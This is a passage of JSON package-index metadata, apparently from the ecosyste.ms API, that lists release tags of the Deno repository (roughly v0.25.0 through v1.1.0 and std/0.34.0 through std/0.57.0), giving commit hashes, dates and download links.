6:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2